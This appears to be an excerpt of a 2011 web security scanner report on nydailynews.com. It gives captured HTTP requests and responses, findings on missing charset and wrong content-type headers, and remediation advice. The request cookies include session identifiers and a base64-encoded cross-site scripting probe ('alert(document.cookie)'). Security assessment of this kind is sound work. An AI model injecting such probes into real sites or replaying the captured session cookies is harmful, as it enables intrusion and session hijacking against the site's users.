GET /homedelivery/index.php HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:40:28 GMT
Server: Apache
Content-Length: 3711
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: sto-id-sg-http-web05_6=CCACAKAK; Expires=Tue, 08-Feb-2011 19:40:56 GMT; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>The New York Daily News</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /services/apps/ipad/redir.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:24:36 GMT
Server: Apache
Content-Length: 3765
Content-Type: text/html
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Too hot for TV: top banned Super Bowl commercials";s0.url="h
...[SNIP]...
// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;